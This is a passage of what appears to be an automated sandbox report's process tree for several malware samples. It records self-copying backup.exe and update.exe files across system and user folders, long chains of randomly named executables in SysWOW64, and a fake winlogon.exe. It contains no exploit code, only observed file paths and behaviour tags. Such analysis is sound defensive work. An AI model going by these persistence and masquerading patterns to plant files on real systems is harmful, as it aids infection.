        "C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\123.0.6312.123\backup.exe" C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\123.0.6312.123\
        10⤵
        
        PID:1992
        
        C:\Program Files (x86)\Google\Update\Install\update.exe
        
        "C:\Program Files (x86)\Google\Update\Install\update.exe" C:\Program Files (x86)\Google\Update\Install\
        8⤵
        
        PID:7100
        
        C:\Program Files (x86)\Google\Update\Install\{80279D00-E918-45B7-8FD9-5E902C3B5EF2}\backup.exe
        
        "C:\Program Files (x86)\Google\Update\Install\{80279D00-E918-45B7-8FD9-5E902C3B5EF2}\backup.exe" C:\Program Files (x86)\Google\Update\Install\{80279D00-E918-45B7-8FD9-5E902C3B5EF2}\
        9⤵
        
        PID:5564
        
        C:\Program Files (x86)\Google\Update\Offline\backup.exe
        
        "C:\Program Files (x86)\Google\Update\Offline\backup.exe" C:\Program Files (x86)\Google\Update\Offline\
        8⤵
        
        PID:7684
      - C:\Program Files (x86)\Internet Explorer\backup.exe
        
        "C:\Program Files (x86)\Internet Explorer\backup.exe" C:\Program Files (x86)\Internet Explorer\
        6⤵
        
        PID:460
        
        C:\Program Files (x86)\Internet Explorer\de-DE\backup.exe
        
        "C:\Program Files (x86)\Internet Explorer\de-DE\backup.exe" C:\Program Files (x86)\Internet Explorer\de-DE\
        7⤵
        
        PID:7904
        
        C:\Program Files (x86)\Internet Explorer\en-US\backup.exe
        
        "C:\Program Files (x86)\Internet Explorer\en-US\backup.exe" C:\Program Files (x86)\Internet Explorer\en-US\
        7⤵
        
        PID:5068
        
        C:\Program Files (x86)\Internet Explorer\es-ES\backup.exe
        
        "C:\Program Files (x86)\Internet Explorer\es-ES\backup.exe" C:\Program Files (x86)\Internet Explorer\es-ES\
        7⤵
        
        PID:7184
        
        C:\Program Files (x86)\Internet Explorer\fr-FR\backup.exe
        
        "C:\Program Files (x86)\Internet Explorer\fr-FR\backup.exe" C:\Program Files (x86)\Internet Explorer\fr-FR\
        7⤵
        
        PID:14608
        
        C:\Program Files (x86)\Internet Explorer\images\backup.exe
        
        "C:\Program Files (x86)\Internet Explorer\images\backup.exe" C:\Program Files (x86)\Internet Explorer\images\
        7⤵
        
        PID:10388
        
        C:\Program Files (x86)\Internet Explorer\it-IT\backup.exe
        
        "C:\Program Files (x86)\Internet Explorer\it-IT\backup.exe" C:\Program Files (x86)\Internet Explorer\it-IT\
        7⤵
        
        PID:5960
        
        C:\Program Files (x86)\Internet Explorer\ja-JP\backup.exe
        
        "C:\Program Files (x86)\Internet Explorer\ja-JP\backup.exe" C:\Program Files (x86)\Internet Explorer\ja-JP\
        7⤵
        
        PID:17736
    - - C:\Users\backup.exe
        
        C:\Users\backup.exe C:\Users\
        5⤵
        
        PID:2328
      - C:\Users\Admin\backup.exe
        
        C:\Users\Admin\backup.exe C:\Users\Admin\
        6⤵
        
        PID:2596
        
        C:\Users\Admin\3D Objects\backup.exe
        
        "C:\Users\Admin\3D Objects\backup.exe" C:\Users\Admin\3D Objects\
        7⤵
        
        PID:3400
        
        C:\Users\Admin\Contacts\backup.exe
        
        C:\Users\Admin\Contacts\backup.exe C:\Users\Admin\Contacts\
        7⤵
        
        PID:6728
        
        C:\Users\Admin\Desktop\update.exe
        
        C:\Users\Admin\Desktop\update.exe C:\Users\Admin\Desktop\
        7⤵
        
        PID:6716
        
        C:\Users\Admin\Documents\backup.exe
        
        C:\Users\Admin\Documents\backup.exe C:\Users\Admin\Documents\
        7⤵
        
        PID:6816
        
        C:\Users\Admin\Documents\OneNote Notebooks\backup.exe
        
        "C:\Users\Admin\Documents\OneNote Notebooks\backup.exe" C:\Users\Admin\Documents\OneNote Notebooks\
        8⤵
        
        PID:2840
        
        C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\backup.exe
        
        "C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\backup.exe" C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\
        9⤵
        
        PID:7760
        
        C:\Users\Admin\Favorites\backup.exe
        
        C:\Users\Admin\Favorites\backup.exe C:\Users\Admin\Favorites\
        7⤵
        
        PID:5744
        
        C:\Users\Admin\Links\backup.exe
        
        C:\Users\Admin\Links\backup.exe C:\Users\Admin\Links\
        7⤵
        
        PID:6812
        
        C:\Users\Admin\Music\backup.exe
        
        C:\Users\Admin\Music\backup.exe C:\Users\Admin\Music\
        7⤵
        
        PID:7580
        
        C:\Users\Admin\OneDrive\backup.exe
        
        C:\Users\Admin\OneDrive\backup.exe C:\Users\Admin\OneDrive\
        7⤵
        
        PID:6428
        
        C:\Users\Admin\Pictures\update.exe
        
        C:\Users\Admin\Pictures\update.exe C:\Users\Admin\Pictures\
        7⤵
        
        PID:3924
        
        C:\Users\Admin\Pictures\Camera Roll\backup.exe
        
        "C:\Users\Admin\Pictures\Camera Roll\backup.exe" C:\Users\Admin\Pictures\Camera Roll\
        8⤵
        
        PID:8144
        
        C:\Users\Admin\Pictures\Saved Pictures\backup.exe
        
        "C:\Users\Admin\Pictures\Saved Pictures\backup.exe" C:\Users\Admin\Pictures\Saved Pictures\
        8⤵
        
        PID:7504
        
        C:\Users\Admin\Saved Games\update.exe
        
        "C:\Users\Admin\Saved Games\update.exe" C:\Users\Admin\Saved Games\
        7⤵
        
        PID:6608
        
        C:\Users\Admin\Searches\backup.exe
        
        C:\Users\Admin\Searches\backup.exe C:\Users\Admin\Searches\
        7⤵
        
        PID:1992
        
        C:\Users\Admin\Videos\backup.exe
        
        C:\Users\Admin\Videos\backup.exe C:\Users\Admin\Videos\
        7⤵
        
        PID:7100
      - C:\Users\Public\backup.exe
        
        C:\Users\Public\backup.exe C:\Users\Public\
        6⤵
        
        PID:1408
        
        C:\Users\Public\Documents\backup.exe
        
        C:\Users\Public\Documents\backup.exe C:\Users\Public\Documents\
        7⤵
        
        PID:7540
        
        C:\Users\Public\Downloads\System Restore.exe
        
        "C:\Users\Public\Downloads\System Restore.exe" C:\Users\Public\Downloads\
        7⤵
        
        PID:6948
        
        C:\Users\Public\Music\backup.exe
        
        C:\Users\Public\Music\backup.exe C:\Users\Public\Music\
        7⤵
        
        PID:6644
        
        C:\Users\Public\Pictures\backup.exe
        
        C:\Users\Public\Pictures\backup.exe C:\Users\Public\Pictures\
        7⤵
        
        PID:6164
        
        C:\Users\Public\Videos\System Restore.exe
        
        "C:\Users\Public\Videos\System Restore.exe" C:\Users\Public\Videos\
        7⤵
        
        PID:7088
    - - C:\Windows\backup.exe
        
        C:\Windows\backup.exe C:\Windows\
        5⤵
        
        PID:744
      - C:\Windows\addins\backup.exe
        
        C:\Windows\addins\backup.exe C:\Windows\addins\
        6⤵
        
        PID:5096
      - C:\Windows\appcompat\backup.exe
        
        C:\Windows\appcompat\backup.exe C:\Windows\appcompat\
        6⤵
        
        PID:3540
        
        C:\Windows\appcompat\appraiser\backup.exe
        
        C:\Windows\appcompat\appraiser\backup.exe C:\Windows\appcompat\appraiser\
        7⤵
        
        PID:7124
        
        C:\Windows\appcompat\appraiser\Telemetry\backup.exe
        
        C:\Windows\appcompat\appraiser\Telemetry\backup.exe C:\Windows\appcompat\appraiser\Telemetry\
        8⤵
        
        PID:4008
        
        C:\Windows\appcompat\encapsulation\backup.exe
        
        C:\Windows\appcompat\encapsulation\backup.exe C:\Windows\appcompat\encapsulation\
        7⤵
        
        PID:2808
        
        C:\Windows\appcompat\Programs\backup.exe
        
        C:\Windows\appcompat\Programs\backup.exe C:\Windows\appcompat\Programs\
        7⤵
        
        PID:7880
      - C:\Windows\apppatch\backup.exe
        
        C:\Windows\apppatch\backup.exe C:\Windows\apppatch\
        6⤵
        
        PID:5764
        
        C:\Windows\apppatch\AppPatch64\backup.exe
        
        C:\Windows\apppatch\AppPatch64\backup.exe C:\Windows\apppatch\AppPatch64\
        7⤵
        
        PID:5908
        
        C:\Windows\apppatch\Custom\backup.exe
        
        C:\Windows\apppatch\Custom\backup.exe C:\Windows\apppatch\Custom\
        7⤵
        
        PID:7908
        
        C:\Windows\apppatch\Custom\Custom64\backup.exe
        
        C:\Windows\apppatch\Custom\Custom64\backup.exe C:\Windows\apppatch\Custom\Custom64\
        8⤵
        
        PID:7364
        
        C:\Windows\apppatch\CustomSDB\backup.exe
        
        C:\Windows\apppatch\CustomSDB\backup.exe C:\Windows\apppatch\CustomSDB\
        7⤵
        
        PID:8092
        
        C:\Windows\apppatch\de-DE\backup.exe
        
        C:\Windows\apppatch\de-DE\backup.exe C:\Windows\apppatch\de-DE\
        7⤵
        
        PID:7180
        
        C:\Windows\apppatch\en-US\backup.exe
        
        C:\Windows\apppatch\en-US\backup.exe C:\Windows\apppatch\en-US\
        7⤵
        
        PID:14592
        
        C:\Windows\apppatch\es-ES\backup.exe
        
        C:\Windows\apppatch\es-ES\backup.exe C:\Windows\apppatch\es-ES\
        7⤵
        
        PID:5192
        
        C:\Windows\apppatch\fr-FR\backup.exe
        
        C:\Windows\apppatch\fr-FR\backup.exe C:\Windows\apppatch\fr-FR\
        7⤵
        
        PID:15284
        
        C:\Windows\apppatch\it-IT\backup.exe
        
        C:\Windows\apppatch\it-IT\backup.exe C:\Windows\apppatch\it-IT\
        7⤵
        
        PID:6648
        
        C:\Windows\apppatch\ja-JP\backup.exe
        
        C:\Windows\apppatch\ja-JP\backup.exe C:\Windows\apppatch\ja-JP\
        7⤵
        
        PID:10364
      - C:\Windows\AppReadiness\update.exe
        
        C:\Windows\AppReadiness\update.exe C:\Windows\AppReadiness\
        6⤵
        
        PID:7304
      - C:\Windows\assembly\backup.exe
        
        C:\Windows\assembly\backup.exe C:\Windows\assembly\
        6⤵
        
        PID:12356
        
        C:\Windows\assembly\GAC\update.exe
        
        C:\Windows\assembly\GAC\update.exe C:\Windows\assembly\GAC\
        7⤵
        
        PID:9008
- - C:\Users\Admin\Downloads\240919-hnkbeawejpeacbd21b64ff72559ab5eedcd804cf3b_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hnkbeawejpeacbd21b64ff72559ab5eedcd804cf3b_JaffaCakes118.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4964
  - - C:\Windows\SysWOW64\4K51K4.exe
      "C:\Windows\system32\4K51K4.exe" "C:\Users\Admin\miukaa.exe"
      4⤵
      PID:3208
    - - C:\Users\Admin\miukaa.exe
        
        "C:\Users\Admin\miukaa.exe"
        5⤵
        
        PID:5916
    - - C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe
        
        C:\Windows\system32\~A~m~B~u~R~a~D~u~L~\winlogon.exe
        5⤵
        
        PID:5272
    - - C:\Windows\SysWOW64\Kantuk.exe
        
        C:\Windows\system32\Kantuk.exe
        5⤵
        
        PID:1536
    - - C:\Windows\SysWOW64\4K51K4.exe
        
        C:\Windows\system32\4K51K4.exe
        5⤵
        
        PID:6772
    - - C:\Windows\SysWOW64\K0L4B0R451.exe
        
        C:\Windows\system32\K0L4B0R451.exe
        5⤵
        
        PID:1828
    - - C:\Windows\SysWOW64\GoldenGhost.exe
        
        C:\Windows\system32\GoldenGhost.exe
        5⤵
        
        PID:6752
- - C:\Users\Admin\Downloads\240919-hnqheswcjf296de8d886989ab61d45f365e7a50a6cbcad0031376c1ca20fb0a75a7b586347N.exe
    C:\Users\Admin\Downloads\240919-hnqheswcjf296de8d886989ab61d45f365e7a50a6cbcad0031376c1ca20fb0a75a7b586347N.exe
    3⤵
    PID:996
  - - C:\Windows\services.exe
      "C:\Windows\services.exe"
      4⤵
      PID:2192
- - C:\Users\Admin\Downloads\240919-hn1cmawelk42977c5c3fb1eeab6b73b1b3ca2c8a50acb151a88a74de26de6c71cd180abe3fN.exe
    C:\Users\Admin\Downloads\240919-hn1cmawelk42977c5c3fb1eeab6b73b1b3ca2c8a50acb151a88a74de26de6c71cd180abe3fN.exe
    3⤵
    PID:1100
  - - C:\Windows\SysWOW64\Nefped32.exe
      C:\Windows\system32\Nefped32.exe
      4⤵
      PID:860
    - - C:\Windows\SysWOW64\Nlphbnoe.exe
        
        C:\Windows\system32\Nlphbnoe.exe
        5⤵
        
        PID:2872
      - C:\Windows\SysWOW64\Oampjeml.exe
        
        C:\Windows\system32\Oampjeml.exe
        6⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\Okedcjcm.exe
        
        C:\Windows\system32\Okedcjcm.exe
        7⤵
        
        PID:3068
        
        C:\Windows\SysWOW64\Oocmii32.exe
        
        C:\Windows\system32\Oocmii32.exe
        8⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\Olgncmim.exe
        
        C:\Windows\system32\Olgncmim.exe
        9⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\Oiknlagg.exe
        
        C:\Windows\system32\Oiknlagg.exe
        10⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\Pojcjh32.exe
        
        C:\Windows\system32\Pojcjh32.exe
        11⤵
        
        PID:4020
        
        C:\Windows\SysWOW64\Pchlpfjb.exe
        
        C:\Windows\system32\Pchlpfjb.exe
        12⤵
        
        PID:2956
        
        C:\Windows\SysWOW64\Pcjiff32.exe
        
        C:\Windows\system32\Pcjiff32.exe
        13⤵
        
        PID:3392
- - C:\Users\Admin\Downloads\240919-hne2pawbrb9fab9a4edeffdb93b4909efb9ec451b0d695ad2fc672dd34c62f391b42a61d35N.exe
    C:\Users\Admin\Downloads\240919-hne2pawbrb9fab9a4edeffdb93b4909efb9ec451b0d695ad2fc672dd34c62f391b42a61d35N.exe
    3⤵
    PID:3592
  - - C:\Windows\SysWOW64\Oidhlb32.exe
      C:\Windows\system32\Oidhlb32.exe
      4⤵
      PID:4052
    - - C:\Windows\SysWOW64\Oblmdhdo.exe
        
        C:\Windows\system32\Oblmdhdo.exe
        5⤵
        
        PID:2276
      - C:\Windows\SysWOW64\Oekiqccc.exe
        
        C:\Windows\system32\Oekiqccc.exe
        6⤵
        
        PID:708
        
        C:\Windows\SysWOW64\Ohkbbn32.exe
        
        C:\Windows\system32\Ohkbbn32.exe
        7⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\Obafpg32.exe
        
        C:\Windows\system32\Obafpg32.exe
        8⤵
        
        PID:1864
        
        C:\Windows\SysWOW64\Pchlpfjb.exe
        
        C:\Windows\system32\Pchlpfjb.exe
        9⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\Plpqil32.exe
        
        C:\Windows\system32\Plpqil32.exe
        10⤵
        
        PID:1504
- - C:\Users\Admin\Downloads\240919-hmv2hswbpg1ac1a96ceeb5fc96ad51b58aea91699cd14147268a160b2eeb2c42b9d97513e4N.exe
    C:\Users\Admin\Downloads\240919-hmv2hswbpg1ac1a96ceeb5fc96ad51b58aea91699cd14147268a160b2eeb2c42b9d97513e4N.exe
    3⤵
    PID:3360
- - C:\Users\Admin\Downloads\240919-hmygmswdql8f32fee6c95f3932400a163c1acf7a7f056daff480047a83b3badb80311f3acaN.exe
    C:\Users\Admin\Downloads\240919-hmygmswdql8f32fee6c95f3932400a163c1acf7a7f056daff480047a83b3badb80311f3acaN.exe
    3⤵
    PID:4944
  - - C:\Windows\SysWOW64\Bjbfklei.exe
      C:\Windows\system32\Bjbfklei.exe
      4⤵
      PID:1996
    - - C:\Windows\SysWOW64\Bkdcbd32.exe
        
        C:\Windows\system32\Bkdcbd32.exe
        5⤵
        
        PID:1416
      - C:\Windows\SysWOW64\Ckilmcgb.exe
        
        C:\Windows\system32\Ckilmcgb.exe
        6⤵
        
        PID:1524
        
        C:\Windows\SysWOW64\Cfnqklgh.exe
        
        C:\Windows\system32\Cfnqklgh.exe
        7⤵
        
        PID:452
        
        C:\Windows\SysWOW64\Cbeapmll.exe
        
        C:\Windows\system32\Cbeapmll.exe
        8⤵
        
        PID:2176
        
        C:\Windows\SysWOW64\Coiaiakf.exe
        
        C:\Windows\system32\Coiaiakf.exe
        9⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\Dbcmakpl.exe
        
        C:\Windows\system32\Dbcmakpl.exe
        10⤵
        
        PID:3068
        
        C:\Windows\SysWOW64\Efepbi32.exe
        
        C:\Windows\system32\Efepbi32.exe
        11⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\Eiieicml.exe
        
        C:\Windows\system32\Eiieicml.exe
        12⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\Fjhacf32.exe
        
        C:\Windows\system32\Fjhacf32.exe
        13⤵
        
        PID:4556
        
        C:\Windows\SysWOW64\Fmfnpa32.exe
        
        C:\Windows\system32\Fmfnpa32.exe
        14⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\Fllkqn32.exe
        
        C:\Windows\system32\Fllkqn32.exe
        15⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\Fbhpch32.exe
        
        C:\Windows\system32\Fbhpch32.exe
        16⤵
        
        PID:424
        
        C:\Windows\SysWOW64\Fjadje32.exe
        
        C:\Windows\system32\Fjadje32.exe
        17⤵
        
        PID:464
        
        C:\Windows\SysWOW64\Gfheof32.exe
        
        C:\Windows\system32\Gfheof32.exe
        18⤵
        
        PID:3064
        
        C:\Windows\SysWOW64\Gmbmkpie.exe
        
        C:\Windows\system32\Gmbmkpie.exe
        19⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\Gbofcghl.exe
        
        C:\Windows\system32\Gbofcghl.exe
        20⤵
        
        PID:3388
        
        C:\Windows\SysWOW64\Giinpa32.exe
        
        C:\Windows\system32\Giinpa32.exe
        21⤵
        
        PID:552
        
        C:\Windows\SysWOW64\Gpcfmkff.exe
        
        C:\Windows\system32\Gpcfmkff.exe
        22⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\Gfmojenc.exe
        
        C:\Windows\system32\Gfmojenc.exe
        23⤵
        
        PID:4480
        
        C:\Windows\SysWOW64\Gljgbllj.exe
        
        C:\Windows\system32\Gljgbllj.exe
        24⤵
        
        PID:1344
        
        C:\Windows\SysWOW64\Gdaociml.exe
        
        C:\Windows\system32\Gdaociml.exe
        25⤵
        
        PID:852
        
        C:\Windows\SysWOW64\Gfokoelp.exe
        
        C:\Windows\system32\Gfokoelp.exe
        26⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\Glldgljg.exe
        
        C:\Windows\system32\Glldgljg.exe
        27⤵
        
        PID:4492
        
        C:\Windows\SysWOW64\Gbfldf32.exe
        
        C:\Windows\system32\Gbfldf32.exe
        28⤵
        
        PID:1152
        
        C:\Windows\SysWOW64\Gkmdecbg.exe
        
        C:\Windows\system32\Gkmdecbg.exe
        29⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\Hibafp32.exe
        
        C:\Windows\system32\Hibafp32.exe
        30⤵
        
        PID:3500
        
        C:\Windows\SysWOW64\Hgfapd32.exe
        
        C:\Windows\system32\Hgfapd32.exe
        31⤵
        
        PID:4744
        
        C:\Windows\SysWOW64\Hmpjmn32.exe
        
        C:\Windows\system32\Hmpjmn32.exe
        32⤵
        
        PID:1864
        
        C:\Windows\SysWOW64\Hcmbee32.exe
        
        C:\Windows\system32\Hcmbee32.exe
        33⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\Hcpojd32.exe
        
        C:\Windows\system32\Hcpojd32.exe
        34⤵
        
        PID:4400
        
        C:\Windows\SysWOW64\Ingpmmgm.exe
        
        C:\Windows\system32\Ingpmmgm.exe
        35⤵
        
        PID:1500
        
        C:\Windows\SysWOW64\Icdheded.exe
        
        C:\Windows\system32\Icdheded.exe
        36⤵
        
        PID:1720
        
        C:\Windows\SysWOW64\Ilmmni32.exe
        
        C:\Windows\system32\Ilmmni32.exe
        37⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\Iloidijb.exe
        
        C:\Windows\system32\Iloidijb.exe
        38⤵
        
        PID:5064
        
        C:\Windows\SysWOW64\Igdnabjh.exe
        
        C:\Windows\system32\Igdnabjh.exe
        39⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\Ipoopgnf.exe
        
        C:\Windows\system32\Ipoopgnf.exe
        40⤵
        
        PID:5488
        
        C:\Windows\SysWOW64\Jpdhkf32.exe
        
        C:\Windows\system32\Jpdhkf32.exe
        41⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\Jjafok32.exe
        
        C:\Windows\system32\Jjafok32.exe
        42⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\Kjccdkki.exe
        
        C:\Windows\system32\Kjccdkki.exe
        43⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\Kglmio32.exe
        
        C:\Windows\system32\Kglmio32.exe
        44⤵
        
        PID:5348
        
        C:\Windows\SysWOW64\Kkjeomld.exe
        
        C:\Windows\system32\Kkjeomld.exe
        45⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\Kmkbfeab.exe
        
        C:\Windows\system32\Kmkbfeab.exe
        46⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\Lcnmin32.exe
        
        C:\Windows\system32\Lcnmin32.exe
        47⤵
        
        PID:1340
        
        C:\Windows\SysWOW64\Mglfplgk.exe
        
        C:\Windows\system32\Mglfplgk.exe
        48⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\Mjmoag32.exe
        
        C:\Windows\system32\Mjmoag32.exe
        49⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\Mnkggfkb.exe
        
        C:\Windows\system32\Mnkggfkb.exe
        50⤵
        
        PID:5600
        
        C:\Windows\SysWOW64\Mkohaj32.exe
        
        C:\Windows\system32\Mkohaj32.exe
        51⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\Mcjmel32.exe
        
        C:\Windows\system32\Mcjmel32.exe
        52⤵
        
        PID:5136
        
        C:\Windows\SysWOW64\Mmbanbmg.exe
        
        C:\Windows\system32\Mmbanbmg.exe
        53⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\Nlcalieg.exe
        
        C:\Windows\system32\Nlcalieg.exe
        54⤵
        
        PID:4416
        
        C:\Windows\SysWOW64\Nmenca32.exe
        
        C:\Windows\system32\Nmenca32.exe
        55⤵
        
        PID:748
        
        C:\Windows\SysWOW64\Ncofplba.exe
        
        C:\Windows\system32\Ncofplba.exe
        56⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\Nlfnaicd.exe
        
        C:\Windows\system32\Nlfnaicd.exe
        57⤵
        
        PID:744
        
        C:\Windows\SysWOW64\Nenbjo32.exe
        
        C:\Windows\system32\Nenbjo32.exe
        58⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\Nccokk32.exe
        
        C:\Windows\system32\Nccokk32.exe
        59⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\Aknifq32.exe
        
        C:\Windows\system32\Aknifq32.exe
        60⤵
        
        PID:948
        
        C:\Windows\SysWOW64\Ahgcjddh.exe
        
        C:\Windows\system32\Ahgcjddh.exe
        61⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\Chglab32.exe
        
        C:\Windows\system32\Chglab32.exe
        62⤵
        
        PID:756
        
        C:\Windows\SysWOW64\Cdpjlb32.exe
        
        C:\Windows\system32\Cdpjlb32.exe
        63⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\Dmohno32.exe
        
        C:\Windows\system32\Dmohno32.exe
        64⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\Dfglfdkb.exe
        
        C:\Windows\system32\Dfglfdkb.exe
        65⤵
        
        PID:3852
        
        C:\Windows\SysWOW64\Doaneiop.exe
        
        C:\Windows\system32\Doaneiop.exe
        66⤵
        
        PID:5276
- - C:\Users\Admin\Downloads\240919-hmmp5swdpkget fucked.exe
    "C:\Users\Admin\Downloads\240919-hmmp5swdpkget fucked.exe"
    3⤵
    PID:2040
  - - C:\Users\Admin\Downloads\240919-hmmp5swdpkget fucked.exe
      "C:\Users\Admin\Downloads\240919-hmmp5swdpkget fucked.exe"
      4⤵
      PID:3272
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:4348
    - - C:\Users\Admin\Downloads\240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
        
        C:\Users\Admin\Downloads\240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
        5⤵
        
        PID:5500
      - C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe
        
        C:\Windows\system32\~A~m~B~u~R~a~D~u~L~\winlogon.exe
        6⤵
        
        PID:1232
      - C:\Windows\SysWOW64\Kantuk.exe
        
        C:\Windows\system32\Kantuk.exe
        6⤵
        
        PID:2404
      - C:\Windows\SysWOW64\4K51K4.exe
        
        C:\Windows\system32\4K51K4.exe
        6⤵
        
        PID:7016
      - C:\Windows\SysWOW64\K0L4B0R451.exe
        
        C:\Windows\system32\K0L4B0R451.exe
        6⤵
        
        PID:948
      - C:\Windows\SysWOW64\GoldenGhost.exe
        
        C:\Windows\system32\GoldenGhost.exe
        6⤵
        
        PID:7028
    - - C:\Users\Admin\Downloads\240919-hn1cmawelk42977c5c3fb1eeab6b73b1b3ca2c8a50acb151a88a74de26de6c71cd180abe3fN.exe
        
        C:\Users\Admin\Downloads\240919-hn1cmawelk42977c5c3fb1eeab6b73b1b3ca2c8a50acb151a88a74de26de6c71cd180abe3fN.exe
        5⤵
        
        PID:3476
      - C:\Windows\SysWOW64\Ffqhcq32.exe
        
        C:\Windows\system32\Ffqhcq32.exe
        6⤵
        
        PID:5472
    - - C:\Users\Admin\Downloads\240919-hne2pawbrb9fab9a4edeffdb93b4909efb9ec451b0d695ad2fc672dd34c62f391b42a61d35N.exe
        
        C:\Users\Admin\Downloads\240919-hne2pawbrb9fab9a4edeffdb93b4909efb9ec451b0d695ad2fc672dd34c62f391b42a61d35N.exe
        5⤵
        
        PID:5768
      - C:\Windows\SysWOW64\Koaagkcb.exe
        
        C:\Windows\system32\Koaagkcb.exe
        6⤵
        
        PID:6748
        
        C:\Windows\SysWOW64\Kgkfnh32.exe
        
        C:\Windows\system32\Kgkfnh32.exe
        7⤵
        
        PID:6156
        
        C:\Windows\SysWOW64\Kofkbk32.exe
        
        C:\Windows\system32\Kofkbk32.exe
        8⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\Kjlopc32.exe
        
        C:\Windows\system32\Kjlopc32.exe
        9⤵
        
        PID:5636
        
        C:\Windows\SysWOW64\Lqhdbm32.exe
        
        C:\Windows\system32\Lqhdbm32.exe
        10⤵
        
        PID:5544
        
        C:\Windows\SysWOW64\Lopmii32.exe
        
        C:\Windows\system32\Lopmii32.exe
        11⤵
        
        PID:6272
        
        C:\Windows\SysWOW64\Lnangaoa.exe
        
        C:\Windows\system32\Lnangaoa.exe
        12⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\Mqafhl32.exe
        
        C:\Windows\system32\Mqafhl32.exe
        13⤵
        
        PID:6696
        
        C:\Windows\SysWOW64\Mjjkaabc.exe
        
        C:\Windows\system32\Mjjkaabc.exe
        14⤵
        
        PID:5576
        
        C:\Windows\SysWOW64\Mnhdgpii.exe
        
        C:\Windows\system32\Mnhdgpii.exe
        15⤵
        
        PID:4664
        
        C:\Windows\SysWOW64\Mmmqhl32.exe
        
        C:\Windows\system32\Mmmqhl32.exe
        16⤵
        
        PID:6188
        
        C:\Windows\SysWOW64\Mmpmnl32.exe
        
        C:\Windows\system32\Mmpmnl32.exe
        17⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\Mfhbga32.exe
        
        C:\Windows\system32\Mfhbga32.exe
        18⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\Njfkmphe.exe
        
        C:\Windows\system32\Njfkmphe.exe
        19⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\Nncccnol.exe
        
        C:\Windows\system32\Nncccnol.exe
        20⤵
        
        PID:6084
        
        C:\Windows\SysWOW64\Nadleilm.exe
        
        C:\Windows\system32\Nadleilm.exe
        21⤵
        
        PID:5792
        
        C:\Windows\SysWOW64\Njmqnobn.exe
        
        C:\Windows\system32\Njmqnobn.exe
        22⤵
        
        PID:6732
        
        C:\Windows\SysWOW64\Omnjojpo.exe
        
        C:\Windows\system32\Omnjojpo.exe
        23⤵
        
        PID:3156
        
        C:\Windows\SysWOW64\Omdppiif.exe
        
        C:\Windows\system32\Omdppiif.exe
        24⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\Ofmdio32.exe
        
        C:\Windows\system32\Ofmdio32.exe
        25⤵
        
        PID:6484
        
        C:\Windows\SysWOW64\Paeelgnj.exe
        
        C:\Windows\system32\Paeelgnj.exe
        26⤵
        
        PID:6444
    - - C:\Users\Admin\Downloads\240919-hmv2hswbpg1ac1a96ceeb5fc96ad51b58aea91699cd14147268a160b2eeb2c42b9d97513e4N.exe
        
        C:\Users\Admin\Downloads\240919-hmv2hswbpg1ac1a96ceeb5fc96ad51b58aea91699cd14147268a160b2eeb2c42b9d97513e4N.exe
        5⤵
        
        PID:5104
    - - C:\Users\Admin\Downloads\240919-hmepjawdnp1966e5403bdb0c490487f871c43fab0b4c1f0822ea577baeb0030b713f2eb7c3N.exe
        
        C:\Users\Admin\Downloads\240919-hmepjawdnp1966e5403bdb0c490487f871c43fab0b4c1f0822ea577baeb0030b713f2eb7c3N.exe
        5⤵
        
        PID:2648
      - C:\Windows\SysWOW64\Pmnbfhal.exe
        
        C:\Windows\system32\Pmnbfhal.exe
        6⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\Pjbcplpe.exe
        
        C:\Windows\system32\Pjbcplpe.exe
        7⤵
        
        PID:1684
        
        C:\Windows\SysWOW64\Phfcipoo.exe
        
        C:\Windows\system32\Phfcipoo.exe
        8⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\Qdoacabq.exe
        
